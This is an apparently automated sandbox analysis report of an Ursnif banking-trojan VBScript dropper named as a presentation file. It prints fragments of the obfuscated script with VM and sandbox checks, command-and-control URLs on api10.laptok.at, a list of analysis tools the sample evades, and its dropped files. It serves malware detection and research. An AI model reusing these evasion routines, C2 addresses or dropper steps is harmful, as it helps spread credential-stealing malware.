Loading ...

Play interactive tourEdit tour

Analysis Report look_presentation_84275.vbs

Overview

General Information

Sample Name:look_presentation_84275.vbs
Analysis ID:286986
MD5:30c60df7f7febee8404ef1ca2c1fac0a
SHA1:1acc068ef95e1b4378f752f839a1c9dcc5c58b2d
SHA256:18d6ba48ce77fd70ba56dc0e6dc2c2f5b45614f181974b3ed8c646164e197af6

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 1156 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\look_presentation_84275.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 1992 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4784 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1992 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5308 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1992 CREDAT:82954 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.392235150.0000000005408000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000004.00000003.392264056.0000000005408000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.392331456.0000000005408000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000004.00000003.400931156.000000000528B000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000004.00000003.392358714.0000000005408000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 5 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\Greenbelt.isoAvira: detection malicious, Label: TR/AD.UrsnifDropper.xjhfo
            Multi AV Scanner detection for domain / URLShow sources
            Source: api10.laptok.atVirustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\Greenbelt.isoVirustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: look_presentation_84275.vbsVirustotal: Detection: 12%Perma Link
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: global trafficHTTP traffic detected: GET /api1/m0nTTmquy9C65rQ4tn/qQCDRAZlN/q1ZwoMEB0ubMQVoh5n7V/WtESt0Z5hctG6G_2Bjz/bU1rZac12CzT2CcifnlH5H/FCAR8LLB8T2KF/nPngZxIW/d8PFvGKxutD7aErRf1uwxEb/n7wTAc12MP/oAHF9p0YLtepeBrgS/1XWdHfH5G1NW/1Axl3h8e7ww/oZMeb_2ByvvRUa/qEVVRjZolFjr_2B9kgn0_/2FXNj0N02u_2B31X/GmB42bPxMUpEmkd/_2FrVeYtO34cmwwh_0/A_0DhpcMr/3FGCUEXMhEcTmB2S4PBD/kRVwj5PJkj5VtaTz67D/CED HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/w_2FoTeexQyD/Fghyn08znyt/1WysawwP7aPlBF/GV3Z_2B1tmX6SKWu5Mi_2/F42kIzQgtwmx9mfr/7nEyUwwGqXrpuGi/8QMa318Mn5f5FJtuDo/NlIjbbeHf/3xbZB4jP46e1hv_2Fv1Y/KPjnvo7YujU4NzmZHqM/vabinagUfyButwYTDG_2FM/kOBGLkWRYTYcT/ixq5z9Q2/Pe6HFdq4V12ZLUrTtHBn_2F/iqkLK8Ok2w/qwZzMenqB_2FFI3nB/bfP7_2F9kcOb/_2Fm48HYkA_/0A_0DNPM980PgR/luzZbO4_2BK4_2FRbwgPc/jnmJbgz4m_2Bjwnb/XYfjDn7PLlZKfKI/Z7O26GDhR/O82a HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 17 Sep 2020 13:53:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: {9BB46ACB-F938-11EA-90E3-ECF4BB570DC9}.dat.12.drString found in binary or memory: http://api10.laptok.at/api1/m0nTTmquy9C65rQ4tn/qQCDRAZlN/q1ZwoMEB0ubMQVoh5n7V/WtESt0Z5hctG6G_2Bjz/bU
            Source: {9BB46ACD-F938-11EA-90E3-ECF4BB570DC9}.dat.12.drString found in binary or memory: http://api10.laptok.at/api1/w_2FoTeexQyD/Fghyn08znyt/1WysawwP7aPlBF/GV3Z_2B1tmX6SKWu5Mi_2/F42kIzQgtw

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.392235150.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392264056.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392331456.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.400931156.000000000528B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392358714.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392303164.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392377269.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392205869.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.452588959.0000000005010000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392398236.0000000005408000.00000004.00000040.sdmp, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.392235150.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392264056.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392331456.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.400931156.000000000528B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392358714.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392303164.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392377269.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392205869.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.452588959.0000000005010000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392398236.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Greenbelt.iso A731BE14CFFB90BC8327D611A9468636FE817C4A7B9484F79D1EBF5AA9CCF805
            Source: look_presentation_84275.vbsInitial sample: Strings found which are bigger than 50
            Source: classification engineClassification label: mal100.troj.evad.winVBS@6/18@2/1
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\look_presentation_84275.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: look_presentation_84275.vbsVirustotal: Detection: 12%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\look_presentation_84275.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1992 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1992 CREDAT:82954 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1992 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1992 CREDAT:82954 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\LyncJump to behavior
            Source: look_presentation_84275.vbsStatic file information: File size 1181058 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: Binary string: c:\25\Ready\death\Soil\Original\41\84\Play\49\Believe\settle\gun\shout\24\note.pdb source: Greenbelt.iso.0.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptFullName)kieGl = iHLOpqas.ReadalliHLOpqas.close'MsgBox((((34 + (7395 - 250.0)) - 7174.0) + 1522.0))REM wildcatter something155 stratus briefcase Kikuyu prostitute chivalrous sextic Springfield embouchure bronze Hiawatha Hester airman weatherstripping quiver955 sob Kingsbury799 agreeable Chiang juncture Frankel custody imagine Clare garlic molecular gloss, 158521 Raul Walpole desolater ambulant jilt voluptuous, knoll lampoon Calkins194 somatic bonze megavolt tortoiseshell defector. Allan mock refrain wineskin onyx milt commutate spalding179 fanout urban bylaw fright lucrative355 competitor Venetian clattery Gaberones effaceable Russell221 typewrite Lagos Romania caching battalion taverna breast Blackburn peril pianissimo inquisitive roughshod gabbro758 hillmen digit roughen781. 3555716 interstitial 'MsgBox(ubound(Split (kieGl,vbCrlf))+(((261 - 255.0) + 228.0) - (234 - 1.0)))'MsgBox((((34 + (7395 - 250.0)) - 7174.0) + 1522.0) - ubound(Split (kieGl,vbCrlf))+((41 + (5 + 742.0)) - (66 + 721.0)))' wine tenement remediable middlemen gunsling Wichita prime lorry lead hurty, bivalve752 constant contiguous anthracnose pentagonal elevate Delphi abjure seam Baltic Costa Compagnie, substantiate either, 8158269 spout subject gobbledygook circumspect faze winch Westfield265, 7567782 bomb brow anarch Menorca contemporaneous wreak, 6643695 torrid echoes maudlin mangy ice plummet anchovy xylene313 Charta Leyden Mercedes ethnic995 mouthpart. 733637 Stearns book761 cook, forthcoming, flinty Johannes soapy Ballard334 Margery conclude retrofitting alias asylum451 exemplary Jude201 troff End FunctionFunction cohere844()on error resume nextIf (InStr(WScript.ScriptName, cStr(395578831)) > 0 And YMkye = 0) ThenExit FunctionEnd IfSet Missy965Service = GetObject("winmgmts:\\.\root\cimv2")Set XNhKYlItems = Missy965Service.ExecQuery("Select * from Win32_Processor", , (((79 + 10.0) + (0.0)) - (160 - 119.0)))For Each chaste In XNhKYlItemsIf chaste.NumberOfCores < ((61 + (-25.0)) + (-((154 - 76.0) + (-45.0)))) Thenscreech176 = TrueEnd IfREM contretemps sardonic crew pilfer criterion qs clairvoyant minnow Babylon516 pitfall Ryan153 whore chairwoman polyphony, Bushnell378 lineage calumny138 violent Daytona whiplash soma404 combustion differentiate Waring Eisenhower airman573 neednt812 flowchart radius300 Bridget, squirmy hop indent MacArthur penal489 Christ stylus prestige taxation peat shako591 drib axe. wigwam path349 carton sickle, honorific yipping, pitchblende418 harrow baroness brisk wane racemose piano sparrow arm63 absolute. clinch embower934, Kemp dig quizzing coachwork, 1152283 Whippany eight465 molasses horseplay381 scapular counterpoint dehydrate acclamation radices Next' archipelago accord landlady. diagrammed trellis additive oceanic correct. 9674830 TWA465, 4289949 ware oboe boatyard advisee, Pomona hydrogenate flan939 shish. alphabet homestead dogmatist niggle draft copperhead cryptanalysis swamp Elkhart accurate cherubim illimitable212. 437

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Greenbelt.isoJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Greenbelt.isoJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.392235150.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392264056.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392331456.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.400931156.000000000528B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392358714.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392303164.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392377269.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392205869.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.452588959.0000000005010000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392398236.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\look_presentation_84275.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)Show sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Greenbelt.isoJump to dropped file
            Source: C:\Windows\System32\wscript.exe TID: 1576Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: wscript.exe, 00000000.00000002.242204360.000001E626ED0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: wscript.exe, 00000000.00000002.242204360.000001E626ED0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.242204360.000001E626ED0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: wscript.exe, 00000000.00000003.219393619.000001E61F2D0000.00000004.00000001.sdmpBinary or memory string: )"ctejkrgnciq"ceeqtf"ncpfncf{0"fkcitcoogf"vtgnnku"cffkvkxg"qegcpke"eqttgev0"";896:52"VYC687.""64:;;6;"yctg"qdqg"dqcv{ctf"cfxkugg."Rqoqpc"j{ftqigpcvg"hncp;5;"ujkuj0"cnrjcdgv"jqoguvgcf"fqiocvkuv"pkiing"ftchv"eqrrgtjgcf"et{rvcpcn{uku"uycor"Gnmjctv"ceewtcvg"ejgtwdko"knnkokvcdng4340""659;969"Ukeknkcp"crrqkpvg"cd{uocn;8"Crjtqfkvg"fqemukfg"ectfkqnqi{0""3585532"ucnxg"Dq{nuvqp"j{ftcpigc"hcvjgt"tgppgv0"P[W"etwuv{"dtqcfgp"rwrcn"vjwpfgtuvqto99:"Ktqswqku"ukdkncpv"ykvjuvcpf"Ejtkuvqrjgt"Dwpfqqtc69;"xcfg"urknnqxgt"ogvcnnwtikuv"Nkpfuc{"rjqp{95;"rtwpg"oqttku76"rgvtqn"korwfgpv0"Jkvngt33:"Hgfqtc"cocvgwtkuj"Ectnkp"eqorngz"Cnvckt0""68784:4"Qtygnn.""98;8926"jqqh"ejwdd{0""4258396"ejggthwn"iqunkpi."Rcwnugp673"uvkttwr"
            Source: wscript.exe, 00000000.00000002.242204360.000001E626ED0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: Greenbelt.iso.0.drJump to dropped file
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
